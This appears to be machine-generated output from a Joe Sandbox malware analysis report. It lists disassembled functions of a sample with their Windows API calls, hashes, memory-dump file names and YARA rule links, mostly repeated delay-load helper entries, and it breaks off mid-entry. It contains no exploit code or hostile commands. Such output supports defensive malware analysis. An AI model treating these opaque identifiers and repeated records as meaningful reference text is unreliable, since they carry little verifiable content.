Instruction ID: 71c2c40a4fd2d888140be7190b9cb5c11de551d607ed44d17fad4da7161b4649
Opcode Fuzzy Hash: 5ed9e73019e4371322a5c7cc6b01e382235956d3653e3d322747facf477ed07f
Instruction Fuzzy Hash: 49D01231011580958F2556354D090997F55FB83376B3DC6A8D0A5C40E1D733C803F641

Function 0087D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0087D43F

Part of subcall function 0087AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0087AC85
Part of subcall function 0087AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0087AC96
Part of subcall function 0087AC74: IsDialogMessageW.USER32(0001043E,?), ref: 0087ACAA
Part of subcall function 0087AC74: TranslateMessage.USER32(?), ref: 0087ACB8
Part of subcall function 0087AC74: DispatchMessageW.USER32(?), ref: 0087ACC2

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: fa0fdd730f62894431da6e2cc25db5c97a99bd3410f7203f1aa366e2a83d4c4b
Instruction ID: 79aaaac36d3d5a39f1b8f9bd3022880918c527812901d24abaade87a8477c436
Opcode Fuzzy Hash: fa0fdd730f62894431da6e2cc25db5c97a99bd3410f7203f1aa366e2a83d4c4b
Instruction Fuzzy Hash: C0D09E31144300BBD6162B51DE06F0F7AA6FB88B05F004554B348B40F28672ED30AB16

Function 0087D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7d34c771b05cca5bca5a8ea14576c707a373570fe14ebe992e5a07ab21f7c798
Instruction ID: 82435354987c5a0db448c8732fc42d6caf55a773fc9be720e8c0ce666204e94a
Opcode Fuzzy Hash: 7d34c771b05cca5bca5a8ea14576c707a373570fe14ebe992e5a07ab21f7c798
Instruction Fuzzy Hash: 1AB092952683016C250861446D52D3A0238E980B10324892EB10EE01C49850EC484432

Function 0087D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 14195432f25189386850c92d0e7b6b42069a1bfde0703515a16c973d60f80886
Instruction ID: ff7d7d067af98313faf499990ca4bff0fa16c674291c861e4876b3a5df5b7829
Opcode Fuzzy Hash: 14195432f25189386850c92d0e7b6b42069a1bfde0703515a16c973d60f80886
Instruction Fuzzy Hash: FCB092952682056C3108A1486D42E3A0228F980B10324842EB10ED02C4D850EC080532

Function 0087D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c0a71f680e07bc5b88425939a09eeb46a7e18be2e39d785bbf016f5c587d132b
Instruction ID: deb8cf12d4bf1e55ed4514a8fc00b6d4de5064eac527a34290aff0eaf30df5fb
Opcode Fuzzy Hash: c0a71f680e07bc5b88425939a09eeb46a7e18be2e39d785bbf016f5c587d132b
Instruction Fuzzy Hash: 60B092912682016C2108A1486D02E360228E981B10324C42FB50ED02C4D850EC090432

Function 0087D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8a244e2b3be850e80f2a39ef8baa308ce13853540636aeb13790b4095c5494b4
Instruction ID: 730b93f20f0ef65c0dffd91ce2100c7f558cca0df0ea90efaf9f24015ac05bfd
Opcode Fuzzy Hash: 8a244e2b3be850e80f2a39ef8baa308ce13853540636aeb13790b4095c5494b4
Instruction Fuzzy Hash: 53B092912682016C2148A1486D02E360228E980B10324C52EB10ED02C4D850EC890432

Function 0087D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8617656db6c48f0f62c10d066f1f03bc4e06e170a60f78bc4b1356f5a6b83382
Instruction ID: 0892b69aa9405eb00701e594c9532d0d0a663b5f6c85c8b28538bf24cb840afb
Opcode Fuzzy Hash: 8617656db6c48f0f62c10d066f1f03bc4e06e170a60f78bc4b1356f5a6b83382
Instruction Fuzzy Hash: 48B092912682016C2108A1496E02E360228E980B10324C42EB10ED02C4D8A0EC0E1432

Function 0087D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 80608446b5d1db32f025437b5f38d23dd6baf47bf6840b1a686dc4fd95326978
Instruction ID: dbbf408fa0cd89230b9766f36723029f127da4a02e24a99ee63b5be409d78561
Opcode Fuzzy Hash: 80608446b5d1db32f025437b5f38d23dd6baf47bf6840b1a686dc4fd95326978
Instruction Fuzzy Hash: 2AB012A226C301AC3108B1487D02E36023CFDC1B10334C42FF50ED02C4D850EC080433

Function 0087D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d182bc5666638c387db6289b8254c3a01b98169d0cea8e918c1c8c2fc9bc4aa1
Instruction ID: be88ecb2ed99af63a29afef7dd86128f861b7ed562aaba975e51c9cd2d14c183
Opcode Fuzzy Hash: d182bc5666638c387db6289b8254c3a01b98169d0cea8e918c1c8c2fc9bc4aa1
Instruction Fuzzy Hash: CCB012A126C301AC3148B1487D02E36023CFDC0B10334C52FF10ED02C4D850EC480433

Function 0087D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 11b4d0bf8cc9ac198234a7feb2dcfd165b9d9f3249c549a752a70c1c634105c8
Instruction ID: 89101e82cc2a279a1ceed0aa51685f67ad1378bf4134b78fc6cee6b175eda33d
Opcode Fuzzy Hash: 11b4d0bf8cc9ac198234a7feb2dcfd165b9d9f3249c549a752a70c1c634105c8
Instruction Fuzzy Hash: F6B012A126C201AC310CB1497E02E36023CFDC0B10334C42FF10ED02C4D890ED090433

Function 0087D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e7eae63828701119bcc8fea9968fbc61f7c6c7539764cd08b4e6ae02428cdca1
Instruction ID: 25a76e9989eebfbb29d7513ca2747fc23793c93e18e347884c3837e6942f52d5
Opcode Fuzzy Hash: e7eae63828701119bcc8fea9968fbc61f7c6c7539764cd08b4e6ae02428cdca1
Instruction Fuzzy Hash: C0B012A126C201AC310CB1497D02E36023CFDC0B10334C42FF10ED02C4DC50EC080433

Function 0087D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4a288400cce9da4e398bdbb992122c442c463df7076180beadc54fd8b65a3a19
Instruction ID: ddba419310c141909612e36bd5bc79eaf2eba1d357efdb843ba621b441f4f4e7
Opcode Fuzzy Hash: 4a288400cce9da4e398bdbb992122c442c463df7076180beadc54fd8b65a3a19
Instruction Fuzzy Hash: B1B012912AD3016C3108B1487D02E36023DFDC1B10334C42FF50ED02C4D850EC080433

Function 0087D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2f462efa372a5fa47466dc6ca8149432e256108377383da67b3034cdeeb6c02f
Instruction ID: 42082f1cc7201b1fb67a228f44a46e1ed3edc97851a4f1186c2a0af287f0b356
Opcode Fuzzy Hash: 2f462efa372a5fa47466dc6ca8149432e256108377383da67b3034cdeeb6c02f
Instruction Fuzzy Hash: 3FB012A126D3016C3148B2487D02E36023DFDC0B10334C52FF10ED02C4D850EC480433

Function 0087D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3cf69553910d587c50a7cfef487b02d1a51de7d11d0e8219bc5f28cbf3c1a1db
Instruction ID: d60a70a71fac36440d3909488a3121c85f660c09971d2a88b8c18ac57365fc40
Opcode Fuzzy Hash: 3cf69553910d587c50a7cfef487b02d1a51de7d11d0e8219bc5f28cbf3c1a1db
Instruction Fuzzy Hash: 23B0129127D6016C3108B1487D02E36027DFDC0B10334C42FF10ED02C4DC50EC080433

Function 0087D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1e746d81c36652090f1a0f661cdbb4ddebba552c4d7adea5178d14051b78e888
Instruction ID: 8a836ccf6d2a8ff3c8f139ad8161b6be191e53388cd09427bb0063b021d4b1ae
Opcode Fuzzy Hash: 1e746d81c36652090f1a0f661cdbb4ddebba552c4d7adea5178d14051b78e888
Instruction Fuzzy Hash: 63B0129126C3016C3108B1587D02E36027CFDC1B10334C42FF60ED02C4E950EC080433

Function 0087D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087D8A3

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 78b547c064713910c7cd332d82954e285d532be252dc7a4eca729b4236af823f
Instruction ID: 7d7ec1f971fb90f75d9c4310308c193b1b218cc9a2c19a6204fe4da491c9665a
Opcode Fuzzy Hash: 78b547c064713910c7cd332d82954e285d532be252dc7a4eca729b4236af823f
Instruction Fuzzy Hash: 2DB012E126C2016C310CB1497E02E3602BCFDC0B10334C42FF10ED02C4E890EC090433

Function 0087DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DAB2

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ee167665df8e7f5c8a8371fa71915b17ff8f8f9c1508929c43f42cb374196ef8
Instruction ID: fe65609d4b443caa5a4f3f1f26a57d038fce22772deb14bf59c3857539e31931
Opcode Fuzzy Hash: ee167665df8e7f5c8a8371fa71915b17ff8f8f9c1508929c43f42cb374196ef8
Instruction Fuzzy Hash: ECB012A226C301AC3108B1497E02E3A027CF9C0B10330C11FF40EC018CD848CC085432

Function 0087DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0087DAB2

Part of subcall function 0087DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0087DFD6
Part of subcall function 0087DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0087DFE7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
